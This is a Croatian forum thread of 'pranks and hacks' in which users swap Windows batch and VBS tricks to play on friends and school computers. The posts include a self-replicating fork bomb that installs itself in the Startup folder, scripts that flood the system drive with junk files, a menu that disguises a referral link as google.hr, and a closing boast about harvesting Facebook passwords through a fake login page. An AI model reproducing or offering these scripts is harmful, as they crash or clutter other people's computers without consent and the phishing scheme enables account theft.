Vaši prankovi (šale) i hackovi

poruka: 1.070
|
čitano: 268.858
|
moderatori: DrNasty, pirat, XXX-Man, vincimus
+/- sve poruke
ravni prikaz
starije poruke gore
16 godina
protjeran
Vaši prankovi(šale) i hackovi

hahah ova homo stvar je kraljevska :D

16 godina
protjeran
RE: Vaši prankovi(šale) i hackovi
1domagoj1 kaže...

Evo da vam oživim malo temu. Inače, ovo nije moja ideja, samo sam pokupio par ideja i spojio ih u skriptu.

Ideju za kopiranje u startup mi je dao forumaš jedan.

@echo off

copy skripta.bat "%SystemDrive%\Documents and Settings\%username%\Start Menu\Programs\Startup\skripta.bat

:top

start skripta.bat

goto top

Dakle, što radi?

echo sakriva poruke, to valjda svi znaju.

copy kopira ovu skriptu u startup folder tako da se prilikom pokretanja računala skripta ponovo izvrši

Ovo dalje je jasno. Skripta pokreće sama sebe, te skripte dalje počnu pokretat same sebe te tako u nedogled,

dok se ne popuni memorija i (u većini slučaja) smrznu Windowsi. Ovo se još zove i fork bombing.

Da se odmah ogradim, ne odgovaram za posljedice. Ovoga se može riješiti jedino iz safe modea.

Ali, možete i dodati da se naredba start pokrene nakon nekog izvjesnog vremena, tako da ako sami isprobavate

imate vremena izbrisati ju iz starup foldera. Uglavnom, ovo napravite samo nekomu koga zaista ne volite.

Moze prijedlog,umjesto "START scripta.bat" stavi START %0%Cool

Moj blog: http://www.xzero-hack.bloger.hr Moj forum: http://www.hacking.smfnew.com
16 godina
neaktivan

evo jedna glupost od mene, ovo u notepad i sufiks .bat :) samo pokrenite nije nikakav virus (za pochetnike) x D

@echo off

:hack

echo Eat Shit Motherfucker!!!!

goto hack

Ako ocima gledamo, a mozgom vidimo, onda slijepi ljudi nemaju mozga
Poruka je uređivana zadnji put uto 22.9.2009 20:41 (BannedOnThisForum).
16 godina
neaktivan
itf4n kaže...

@xZero1 - erm, koga pokušavaš zavarati? Očito je da neznaš, i u tome nema ništa loše. Ali zašto se pretvarati?

@!mpact35 - što se tiće mog znanja, poznajem prilično dobro C/C++, nešto .NET jezika (VB, C#), natucam neke egzotične jezike (Ruby, BrainFuck!...). Ne smatram se nekim vrsnim programerom (i ja sam u srednjoj školi), ali eto, živcira me kad se 10godišnjaci hvale "svojim" uberkul cmd batchevima. Ali valjda sam i ja bio u toj fazi... u pravu si. Isključujem se iz ove teme, osim ako nešto posebno ne privuce moju pozornost =)

Neznaš o čemu pričaš...ni blizu...čovjek stvarno zna znanje...

a ono što si reko da znam c/p (copy-pasteat), malo si krivo razumio, ja sam to kopiro s svojeg bloga...

nego ajd da stavim jedan c "poluvirus" (neka vrsta virusa i je, ali mora bit upaljen satima i satima da bi napravio sitnu štetu koja se ukloni u roku od 2-3 sec.), prije bi se ogo nazvat normalnim programom jer ko zna, možda vam jednom i zatreba šar tisuća 9 u jednom txt fileu...itfan, ti češ ovaj program razumjeti jer ti znaš dobro c....

#include <stdio.h>
#define true 1

main()
{
 FILE *bono;
 bono = fopen ("bono.txt", "w");
 while (true)
 {
  fprintf (bono, "9");
 }
}

P.S. ako nemate kompajler za c, onda vam ovo stvarno ništa ne vrjedi...

thunder in my room :prijevod: Moja mama viče!92% tinejđera sluša turbo folk. Ako si ti među onih 8% koji još uvijek slušaju pravu glazbu kopiraj si ovo u potpis.Da se Facebook server sruši 90% m
17 godina
neaktivan

fali ti int prije main() :D (iako će u većini kompajlera raditi i bez toga, novo pravilo Ca je da pišeš tipove)

The candle flame gutters. Its little pool of light trembles. Darkness gathers. The demons begin to stir.
16 godina
protjeran
Capitan Hook kaže...
itf4n kaže...

@xZero1 - erm, koga pokušavaš zavarati? Očito je da neznaš, i u tome nema ništa loše. Ali zašto se pretvarati?

@!mpact35 - što se tiće mog znanja, poznajem prilično dobro C/C++, nešto .NET jezika (VB, C#), natucam neke egzotične jezike (Ruby, BrainFuck!...). Ne smatram se nekim vrsnim programerom (i ja sam u srednjoj školi), ali eto, živcira me kad se 10godišnjaci hvale "svojim" uberkul cmd batchevima. Ali valjda sam i ja bio u toj fazi... u pravu si. Isključujem se iz ove teme, osim ako nešto posebno ne privuce moju pozornost =)

Neznaš o čemu pričaš...ni blizu...čovjek stvarno zna znanje...

a ono što si reko da znam c/p (copy-pasteat), malo si krivo razumio, ja sam to kopiro s svojeg bloga...

nego ajd da stavim jedan c "poluvirus" (neka vrsta virusa i je, ali mora bit upaljen satima i satima da bi napravio sitnu štetu koja se ukloni u roku od 2-3 sec.), prije bi se ogo nazvat normalnim programom jer ko zna, možda vam jednom i zatreba šar tisuća 9 u jednom txt fileu...itfan, ti češ ovaj program razumjeti jer ti znaš dobro c....

#include <stdio.h>
#define true 1

main()
{
 FILE *bono;
 bono = fopen ("bono.txt", "w");
 while (true)
 {
  fprintf (bono, "9");
 }
}

P.S. ako nemate kompajler za c, onda vam ovo stvarno ništa ne vrjedi...

Slažem se. Zanimljiva scripta :D

Moj blog: http://www.xzero-hack.bloger.hr Moj forum: http://www.hacking.smfnew.com
16 godina
neaktivan

jel zna itko kako staviti da se nevidi kad se neki program izvodi (tipa kad se izvodi vbs nevidi se da je išta pokrenuto osim u task manageru, ali svejedno radi)?

thunder in my room :prijevod: Moja mama viče!92% tinejđera sluša turbo folk. Ako si ti među onih 8% koji još uvijek slušaju pravu glazbu kopiraj si ovo u potpis.Da se Facebook server sruši 90% m
16 godina
neaktivan
itf4n kaže...

Znam da radi, ali mislim da je ono kompliciranje bezveze... slobodno izbaci :top i goto :top

nije, ovako puno brže radi...

17 godina
neaktivan
Capitan Hook kaže...
itf4n kaže...

Znam da radi, ali mislim da je ono kompliciranje bezveze... slobodno izbaci :top i goto :top

nije, ovako puno brže radi...

Doista? Batchovo shellanje podržava više procesa?

Uh, nadam se da si to provjerio, jer mi zvuči veoma nerealno.

The candle flame gutters. Its little pool of light trembles. Darkness gathers. The demons begin to stir.
16 godina
neaktivan

Možete mi reći kako spremiti u notepad-u u .vbs i .bat. Nemam pojma o tome!

16 godina
neaktivan

upišeš u Notepad i ideš na "Datoteka" pa "Spremi kao..." i onda upišeš naziv i dodaš nastavak recimo .vbs

Primjer:

šala.vbs

Zašto su smajlići žuti? Hmm... | Klikni HVALA, tvoj jedan klik meni puno znači!
Poruka je uređivana zadnji put uto 6.10.2009 14:50 (Fićo_CoD 5).
16 godina
neaktivan

Zanima me dali je moguce zakamuflirati link tj. web addressu.

Naprimjer link izgleda da je od youtubea a zapravo vodi na yahoo,

Nisan tija otvarati novu temu, nadam se da nisan nekoga naljutia

Suspended Animation
16 godina
protjeran
Stalk3r kaže...

Zanima me dali je moguce zakamuflirati link tj. web addressu.

Naprimjer link izgleda da je od youtubea a zapravo vodi na yahoo,

Nisan tija otvarati novu temu, nadam se da nisan nekoga naljutia

@ECHO OFF

ECHO.

TITLE Created by xZero

ECHO Please select WEB page.

ECHO.

ECHO 1. www.google.hr

ECHO 2. www.bloger.hr

ECHO.

SET/p confirm="Selected >"

IF '%confirm%'=='1' START http://s8.ba.bitefight.org/c.php?uid=34313 & EXIT

IF '%confirm%'=='2' START http://www.google.hr & EXIT

EXIT

16 godina
protjeran
Capitan Hook kaže...

jel zna itko kako staviti da se nevidi kad se neki program izvodi (tipa kad se izvodi vbs nevidi se da je išta pokrenuto osim u task manageru, ali svejedno radi)?

Moze.

Treba ti OVO

Za pomoć obratite mi se na MSN: xzero707@hotmail.com

Poruka je uređivana zadnji put sri 7.10.2009 2:45 (xZero1).
15 godina

hehhee dodajte ovo kod frenda u autoexec

cd %windir%
nircmd.exe cdrom open d:
nircmd.exe cdrom close d:

naravno :d zamjenite slovom od cd/dvd uređaja xD, ja sam stavio na 3 kompjutera na informatiki, profa sad se ljuti nezna šta je a avast nis ne detektira

CoD4:MW modder; VK_MOD 217.163.30.22:28960
17 godina
neaktivan
itf4n kaže...

fali ti int prije main() :D (iako će u većini kompajlera raditi i bez toga, novo pravilo Ca je da pišeš tipove)

U tom slučaju fali mu i return na kraju :). Ili da stavi void main().

Što se tiče onog batcha, ako se dobro sjećam, svaki novi koji se pokrene opet pokreće nove, pa ti novi nove, pa ti novi novi nove itd. :)

Bilo je davno kad sam to postal, pa ako sam u krivu nek me neko ispravi

@za post ispod itf4n-ovog

Ja bi to nazvao programom, a ne skriptom.

Promijenio sam potpis, nisam htio otvarat novu temu pa evo link ovdje - http://www.100mb.nl/
16 godina
neaktivan

Evo jednog zanimljivog a kratkog:

@ECHO OFF

:BEGIN

ECHO %random%>>%SystemDrive%\%random%%random%%random%.haha

GOTO BEGIN

Spremiti kao bilo_sta.cmd ili bilo_sta.bat i dati zrtvi Belji se

Danas Pobrao 2x zuti karton ,ufff :| Forum: http://www.elite7hackers.byethost16.com/
16 godina
RE: Vaši prankovi (šale) i hackovi
xZero kaže...

Evo jednog zanimljivog a kratkog:

@ECHO OFF

:BEGIN

ECHO %random%>>%SystemDrive%\%random%%random%%random%.haha

GOTO BEGIN

Spremiti kao bilo_sta.cmd ili bilo_sta.bat i dati zrtvi Belji se

Bude tebe opet zvao sud domaSmijeh

Nego daj opisi svakog koji stavis tu da znamo.

LOL CAT! ^^
15 godina
neaktivan

Pišite opis pored toga što predložite da znamo o čemu se radi i koliko je opasno

Society leans ever heavily on computers, if you have the power to take out computers you can take out society.
16 godina
neaktivan

U redu. Slazem se. Cool

Forum: http://www.elite7hackers.byethost16.com/
15 godina
neaktivan

neznam ako je bilo, ako je sry

Zelite da vam nitko ne dira background sliku? evo kako:

odite u run i upisite regedit da bi usli u reg editor, i onda u HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system i tu napravite novi DWORD i ime nek mu bude "NoDispBackgroundPage" bez navodnika naravno, dvoklik na to i value mu stavite pod 1, i voila, probajte desni klick na desktop i properties i vidit cete da nesto fali xD

ako zelite vratit na staro stavite value 0 ili izbrisite dword

ovo mi je bila fora u osnovnoj stavit neku golotinju na background i onda to napravit pa onda reakcije profesora kad oce mijenjat pozadinu Smijeh

bila je i slicna fora s dword u istoj lokaciji za maknut shutdown tipku iz start-a, isto zanimljive reakcije kad neko oce gasit komp

ovo sam probao samo na xp-u, neznam dali na visti i 7-ici radi, idem sad na 7-icu probat

edit: ovaj sistem na 7-ici neradi :(

Poruka je uređivana zadnji put pet 12.3.2010 23:55 (Toni2000).
16 godina

ajde nek netko napravi prank da izbacuje errore i otvara i zatvara se cdrom na pola minute.....onda stane...pa za pola minute opet...i tako stalno Nevinašce

I don't ask why people lie, I just assume they all do.
16 godina
neaktivan
rocker55555 kaže...

ajde nek netko napravi prank da izbacuje errore i otvara i zatvara se cdrom na pola minute.....onda stane...pa za pola minute opet...i tako stalno Nevinašce

Ja cu napraviti. Do navecer ce biti gotov. Cool

16 godina
xZero kaže...
rocker55555 kaže...

Ja cu napraviti. Do navecer ce biti gotov. Cool

e hvala...ima da zaje*avam frendove Izlanuo se

I don't ask why people lie, I just assume they all do.
15 godina
neaktivan

xZero, imam jednu jednostavnu ideju ali da bude veća fora jel se može kako u spriječiti da se pomiče msgbox (u vbs-u) znači da kad se prozor odvuče negdje da se vrati na staro ili na neku određenu poziciju, recimo 0,0 i tu zaključa?

Evo dat ću ovo:

Do
msgbox "Do you want to close this window?",20,"Question from Windows"
Loop

I to je dosta živcirajuće, ali sad bi još tu trebalo ubaciti ovo da se prozora ne može riješiti tako da se odvuče na rub (uvijek bi se vraćao na staro), ako je moguće.

17 godina
odjavljen

Veća baza je prozor koji bi bježao tako da korisnik ne može kliknit.

U životu ne postoje pobjednici, samo preživjeli.
16 godina
neaktivan
blagus kaže...

xZero, imam jednu jednostavnu ideju ali da bude veća fora jel se može kako u spriječiti da se pomiče msgbox (u vbs-u) znači da kad se prozor odvuče negdje da se vrati na staro ili na neku određenu poziciju, recimo 0,0 i tu zaključa?

Evo dat ću ovo:

Do
Loop

I to je dosta živcirajuće, ali sad bi još tu trebalo ubaciti ovo da se prozora ne može riješiti tako da se odvuče na rub (uvijek bi se vraćao na staro), ako je moguće.

Pokušat ću Cool

15 godina
neaktivan
xZero kaže...
blagus kaže...

Evo dat ću ovo:

Do
Loop

Pokušat ću Cool

Hvala. Probaj ovo što je MrBlc probao da prozor bježi ako neće uspjeti ovo sa nepomicanjem. I ako sam dobro našao, možda bi pomogli "onMouseDown" i "onMouse Click".

17 godina
neaktivan

Evo jedan zanimljivi:

MsgBox "Memory violation at 0x04868",21,"firefox.exe"
Set wshShell = WScript.CreateObject ("WSCript.shell")
wshshell.run """c:\Program Files\Mozilla Firefox\firefox.exe""", 6, True
set wshshell = nothing

Što radi? Prikazuje error(prva slika) zatim nakon što se klikne na bilo koji gumb otvara firefox.Napravite shortcut na njega i stavite naziv i ikonu firefoxa i zabava je zajamčena.

P.S. Spremite kao .vbs .Namigiva

Da se Facebook server sruši 90% mladih palo bi u tešku depresiju. Ako si u onih 10% koji bi im se smijali stavi ovo u sign.-----Što se dogodi Facebook profilu kad čovik krepa?
Poruka je uređivana zadnji put sub 13.3.2010 21:21 (lzgr).
16 godina
protjeran

Evo kako ja kupim šifre of Facebooka (ne volim ga). Uploadao sam stranicu na yourfreehosting.net i sada u školi otvorim modificiranu stranicu facebook logina(izgleda isto) i kada netko upiše mail i password meni on dodje u jednu notepad datoteku (isto na yourfreehosting.net). Koga zanimaju pojedinosti više na pmSmijeh

Čovjek pun duha i u potpunoj se samoći izvanredno zabavlja svojim mislima.
Nova poruka
E-mail:
Lozinka:

vrh stranice